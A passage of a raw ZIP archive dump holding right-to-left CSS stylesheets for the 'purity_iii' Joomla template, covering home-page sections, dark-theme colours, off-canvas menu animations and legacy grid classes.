  right: calc(132%);
  bottom: calc(132%);
}
.contentpane .subhead {
  border-bottom: 1px solid #ddd;
  padding-bottom: 12px;
}
.contentpane .subhead .btn-toolbar {
  display: flex;
  gap: 10px;
  margin: 0;
}
.contentpane .subhead .btn-toolbar::before,
.contentpane .subhead .btn-toolbar::after {
  display: none;
}
.contentpane .media-sidebar {
  border-left: 1px solid #ddd;
}
.contentpane .media-toolbar {
  border-bottom: 1px solid #ddd;
  margin-left: 20px;
  padding-right: 20px;
}
.contentpane .media-toolbar .media-toolbar-icon {
  border-right: 1px solid #ddd;
}
.contentpane .media-toolbar .icon-search-minus,
.contentpane .media-toolbar .icon-search-plus {
  font-family: FontAwesome3;
}
.contentpane .media-toolbar .icon-search-minus::before,
.contentpane .media-toolbar .icon-search-plus::before {
  content: "\f010";
  display: block;
  font-size: 16px;
}
.contentpane .media-toolbar .icon-search-plus::before {
  content: "\f00e";
}
.com_contact fieldset.filters {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
}
.com_contact .com-contact-featured__filter {
  display: flex;
  flex-wrap: wrap;
}
.com_contact .display-limit {
  margin: 0;
}
.com_contact table.category {
  margin-top: 2rem;
}



.off-canvas body > .autocompleter-choices {
  width: 0px;
  left: auto;
}
article img[align=left],
.img_caption.left,
.pull-left.item-image {
  margin: 0 40px 20px 0;
}
article img[align=right],
.img_caption.right,
.pull-right.item-image {
  margin: 0 0 20px 40px;
}
.languageswitcherload ul {
  float: left;
}PKӜ�\mAa`[[purity_iii/css/rtl/home.cssnu&1i�

.home h1 {
  line-height: 1;
}
.home h2 {
  font-size: 21px;
}
@media screen and (min-width: 768px) {
  .home h2 {
    font-size: 30px;
  }
}
.home .jumbotron {
  background-color: transparent;
  position: relative;
  margin-bottom: 0;
}
.home .t3-sl-1 {
  padding: 0;
  background: #ffffff;
  color: #333333;
  border-bottom: 1px solid #eeeeee;
}
.home .t3-sl-1 .jumbotron {
  border-radius: 0;
}
.home .t3-sl-1 .jumbotron .btn {
  margin-top: 20px;
}
.home .t3-sl-2 {
  text-align: center;
}
.home .t3-sl-2 .img-responsive {
  display: inline-block;
}
@media screen and (min-width: 768px) {
  .home .t3-sl-2 p {
    font-size: 16px;
    line-height: 22px;
  }
}
.home .t3-sl-3 p > img {
  margin-top: 20px;
}
@media screen and (min-width: 992px) {
  .home .t3-sl-3 p > img {
    margin-top: 0;
  }
}
.home .t3-sl-3,
.home .t3-sl-4 {
  border-top: 1px solid #eeeeee;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .home .t3-sl-3 p,
  .home .t3-sl-4 p {
    font-size: 16px;
    line-height: 22px;
  }
}
.home .t3-sl-3 .jumbotron,
.home .t3-sl-4 .jumbotron {
  padding-top: 0;
}
.home .t3-sl-3 .jumbotron h1,
.home .t3-sl-4 .jumbotron h1 {
  margin-bottom: 10px;
  margin-top: 0;
}
.home .t3-sl-3 .jumbotron p,
.home .t3-sl-4 .jumbotron p {
  font-size: 18px;
  line-height: 1.25;
  color: #999999;
}
@media screen and (min-width: 768px) {
  .home .t3-sl-3 .jumbotron p,
  .home .t3-sl-4 .jumbotron p {
    font-size: 21px;
  }
}
.home .t3-sl-5 {
  background: #ffffff;
  color: #333333;
  border-top: 1px solid #eeeeee;
  padding: 0;
}
.home .t3-sl-5 .jumbotron {
  border-radius: 0;
  margin-bottom: 0;
}
PKӜ�\�0�F[[ purity_iii/css/rtl/dark/home.cssnu&1i�

.home h1 {
  line-height: 1;
}
.home h2 {
  font-size: 21px;
}
@media screen and (min-width: 768px) {
  .home h2 {
    font-size: 30px;
  }
}
.home .jumbotron {
  background-color: transparent;
  position: relative;
  margin-bottom: 0;
}
.home .t3-sl-1 {
  padding: 0;
  background: #1f1f1f;
  color: #878787;
  border-bottom: 1px solid #2d2d2d;
}
.home .t3-sl-1 .jumbotron {
  border-radius: 0;
}
.home .t3-sl-1 .jumbotron .btn {
  margin-top: 20px;
}
.home .t3-sl-2 {
  text-align: center;
}
.home .t3-sl-2 .img-responsive {
  display: inline-block;
}
@media screen and (min-width: 768px) {
  .home .t3-sl-2 p {
    font-size: 16px;
    line-height: 22px;
  }
}
.home .t3-sl-3 p > img {
  margin-top: 20px;
}
@media screen and (min-width: 992px) {
  .home .t3-sl-3 p > img {
    margin-top: 0;
  }
}
.home .t3-sl-3,
.home .t3-sl-4 {
  border-top: 1px solid #2d2d2d;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .home .t3-sl-3 p,
  .home .t3-sl-4 p {
    font-size: 16px;
    line-height: 22px;
  }
}
.home .t3-sl-3 .jumbotron,
.home .t3-sl-4 .jumbotron {
  padding-top: 0;
}
.home .t3-sl-3 .jumbotron h1,
.home .t3-sl-4 .jumbotron h1 {
  margin-bottom: 10px;
  margin-top: 0;
}
.home .t3-sl-3 .jumbotron p,
.home .t3-sl-4 .jumbotron p {
  font-size: 18px;
  line-height: 1.25;
  color: #5a5a5a;
}
@media screen and (min-width: 768px) {
  .home .t3-sl-3 .jumbotron p,
  .home .t3-sl-4 .jumbotron p {
    font-size: 21px;
  }
}
.home .t3-sl-5 {
  background: #1f1f1f;
  color: #878787;
  border-top: 1px solid #2d2d2d;
  padding: 0;
}
.home .t3-sl-5 .jumbotron {
  border-radius: 0;
  margin-bottom: 0;
}
PKӜ�\��]3]N]N&purity_iii/css/rtl/dark/off-canvas.cssnu&1i�

.off-canvas-toggle {
  z-index: 100;
}
html,
body {
  height: 100%;
}
.noscroll {
  position: fixed;
  overflow-y: scroll;
  width: 100%;
}
.t3-wrapper {
  background: #1f1f1f;
  position: relative;
  right: 0;
  z-index: 99;
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  overflow: visible;
}
.t3-wrapper::after {
  position: absolute;
  top: 0;
  left: 0;
  width: 0;
  height: 0;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  z-index: 100;
}
.off-canvas-open .t3-wrapper::after {
  width: 100%;
  height: 10000px;
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.t3-off-canvas {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 100;
  visibility: hidden;
  width: 250px;
  height: 100%;
  overflow-x: hidden;
  overflow-y: auto;
  -webkit-transition: all 0.5s;
  transition: all 0.5s;
}
.t3-off-canvas::after {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-right.t3-off-canvas {
  display: none;
}
.off-canvas-right .off-canvas-right.t3-off-canvas {
  display: block;
}
html[dir="ltr"] .off-canvas-right.t3-off-canvas {
  right: auto;
  left: 0;
}
.off-canvas-open .t3-off-canvas::after {
  width: 0;
  height: 0;
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .off-canvas-current {
  visibility: visible;
}
.t3-off-canvas {
  background: #1f1f1f;
  color: #878787;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #878787;
  color: #878787;
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #ffffff;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #d9d9d9;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .dropdown-menu {
  position: static;
  float: none;
  display: block;
  width: 100%;
  padding: 0;
  border: 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-1.off-canvas-open .off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-1.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-2.t3-off-canvas {
  z-index: 1;
}
.off-canvas-effect-2.off-canvas-open .off-canvas-effect-2.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-2.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .off-canvas-effect-3.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-3.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .off-canvas-effect-4.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-4.t3-off-canvas {
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .off-canvas-effect-5.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
body.off-canvas-effect-6 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
  height: auto;
  overflow: hidden;
}
.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0) rotateY(-15deg);
  transform: translate3d(250px, 0, 0) rotateY(-15deg);
}
.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-6.off-canvas-open .off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-6.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0) rotateY(15deg);
  transform: translate3d(-250px, 0, 0) rotateY(15deg);
}
.off-canvas-right.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-7 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-7 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .off-canvas-effect-7.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-7.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(90deg);
  transform: translate3d(100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-8 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-8 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .off-canvas-effect-8.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
.off-canvas-effect-8.t3-off-canvas::after {
  display: none;
}
body.off-canvas-effect-8.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-9 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-9 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-9.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-9.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-9.off-canvas-open .off-canvas-effect-9.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-9.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-9.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-10 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-10.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-10.off-canvas-open .off-canvas-effect-10.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
body.off-canvas-effect-10.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-11 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-11 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(100px, 0, -600px) rotateY(-20deg);
  transform: translate3d(100px, 0, -600px) rotateY(-20deg);
}
.off-canvas-effect-11.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-11.off-canvas-open .off-canvas-effect-11.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-11.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-100px, 0, -600px) rotateY(20deg);
  transform: translate3d(-100px, 0, -600px) rotateY(20deg);
}
.off-canvas-right.off-canvas-effect-11.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-12 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-12 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(-10deg);
  transform: rotateY(-10deg);
}
.off-canvas-effect-12.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-12.off-canvas-open .off-canvas-effect-12.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-12.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-12 .t3-wrapper {
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(10deg);
  transform: rotateY(10deg);
}
.off-canvas-right.off-canvas-effect-12.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-13 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-13.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, -100%, 0);
  transform: translate3d(0, -100%, 0);
}
.off-canvas-effect-13.off-canvas-open .off-canvas-effect-13.t3-off-canvas {
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
  -webkit-transition-speed: 0.2s;
  transition-speed: 0.2s;
}
body.off-canvas-effect-13.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-14 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-14 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .off-canvas-effect-14.t3-off-canvas {
  -webkit-transition-delay: 0.1s;
  transition-delay: 0.1s;
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-14.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
.old-ie .t3-off-canvas {
  z-index: 100!important;
  right: -250px;
}
html[dir="ltr"] .off-canvas-right.old-ie .t3-off-canvas {
  left: -250px;
  right: auto;
}
.modal-open .t3-wrapper {
  position: static;
}
.off-canvas-toggle {
  border-radius: 0;
  border: 0;
  padding: 0;
  width: 50px;
  height: 50px;
  line-height: 50px;
}
.off-canvas-toggle:focus {
  outline: none;
}
.t3-off-canvas {
  background: #1f1f1f;
  color: #878787;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #878787;
  color: #878787;
  padding: 0 12px 0 0;
  height: 35px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
  line-height: 35px;
  font-size: 14px;
  font-weight: bold;
  text-transform: uppercase;
}
.t3-off-canvas .close {
  margin: 0;
  height: 35px;
  line-height: 35px;
  width: 35px;
  background: #545454;
  position: absolute;
  top: 0;
  left: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 24px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #ffffff;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #d9d9d9;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .t3-module {
  margin-bottom: 20px;
}
.t3-off-canvas .t3-off-canvas-body .module-title {
  margin-bottom: 10px;
}

@media (max-width: 768px) {
  .off-canvas body > * {
    left: 0;
    -webkit-transform: translateX(0%);
    -ms-transform: translateX(0%);
    transform: translateX(0%);
  }
  .off-canvas #off-canvas-nav .t3-mainnav {
    -webkit-transform: translateX(100%);
    -ms-transform: translateX(100%);
    transform: translateX(100%);
  }
  .off-canvas-enabled body > * {
    -webkit-transform: translateX(-250px);
    -ms-transform: translateX(-250px);
    transform: translateX(-250px);
  }
}
.off-canvas-left.t3-off-canvas {
  left: 0;
  right: auto;
}
.off-canvas-left.old-ie .t3-off-canvas {
  left: -250px;
  right: auto;
}
PKӜ�\1�o�ll#purity_iii/css/rtl/dark/windows.cssnu&1i�

.window body {
  height: auto;
  padding: 0;
  margin: 0;
}
.window .window-mainbody {
  padding: 20px;
}
PKӜ�\m��I�
�
'purity_iii/css/rtl/dark/legacy-grid.cssnu&1i�

.row-fluid {
  margin-right: -15px;
  margin-left: -15px;
}
.row-fluid:before,
.row-fluid:after {
  content: " ";
  display: table;
}
.row-fluid:after {
  clear: both;
}
[class*="span"] {
  float: right;
}
.span1, .span2, .span3, .span4, .span5, .span6, .span7, .span8, .span9, .span10, .span11, .span12 {
  position: relative;
  min-height: 1px;
  padding-right: 15px;
  padding-left: 15px;
}
.span12 {
  width: 100%;
}
.span11 {
  width: 91.66666666666666%;
}
.span10 {
  width: 83.33333333333334%;
}
.span9 {
  width: 75%;
}
.span8 {
  width: 66.66666666666666%;
}
.span7 {
  width: 58.33333333333334%;
}
.span6 {
  width: 50%;
}
.span5 {
  width: 41.66666666666667%;
}
.span4 {
  width: 33.33333333333333%;
}
.span3 {
  width: 25%;
}
.span2 {
  width: 16.66666666666666%;
}
.span1 {
  width: 8.333333333333332%;
}
.offset12 {
  margin-right: 100%;
}
.offset11 {
  margin-right: 91.66666666666666%;
}
.offset10 {
  margin-right: 83.33333333333334%;
}
.offset9 {
  margin-right: 75%;
}
.offset8 {
  margin-right: 66.66666666666666%;
}
.offset7 {
  margin-right: 58.33333333333334%;
}
.offset6 {
  margin-right: 50%;
}
.offset5 {
  margin-right: 41.66666666666667%;
}
.offset4 {
  margin-right: 33.33333333333333%;
}
.offset3 {
  margin-right: 25%;
}
.offset2 {
  margin-right: 16.66666666666666%;
}
.offset1 {
  margin-right: 8.333333333333332%;
}
.offset0 {
  margin-right: 0%;
}
.visible-phone {
  display: none !important;
}
.visible-tablet {
  display: none !important;
}
.hidden-desktop {
  display: none !important;
}
.visible-desktop {
  display: inherit !important;
}
@media (min-width: 768px) and (max-width: 979px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important ;
  }
  .visible-tablet {
    display: inherit !important;
  }
  .hidden-tablet {
    display: none !important;
  }
}
@media (max-width: 767px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-phone {
    display: inherit !important;
  }
  .hidden-phone {
    display: none !important;
  }
}
.width-10 {
  width: 10px;
}
.width-20 {
  width: 20px;
}
.width-30 {
  width: 30px;
}
.width-40 {
  width: 40px;
}
.width-50 {
  width: 50px;
}
.width-60 {
  width: 60px;
}
.width-70 {
  width: 70px;
}
.width-80 {
  width: 80px;
}
.width-90 {
  width: 90px;
}
.width-100 {
  width: 100px;
}
.height-10 {
  height: 10px;
}
.height-20 {
  height: 20px;
}
.height-30 {
  height: 30px;
}
.height-40 {
  height: 40px;
}
.height-50 {
  height: 50px;
}
.height-60 {
  height: 60px;
}
.height-70 {
  height: 70px;
}
.height-80 {
  height: 80px;
}
.height-90 {
  height: 90px;
}
.height-100 {
  height: 100px;
}
PKӜ�\,�S��%purity_iii/css/rtl/dark/bootstrap.cssnu&1i�

article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
nav,
section,
summary {
  display: block;
}
audio,
canvas,
video {
  display: inline-block;
}
audio:not([controls]) {
  display: none;
  height: 0;
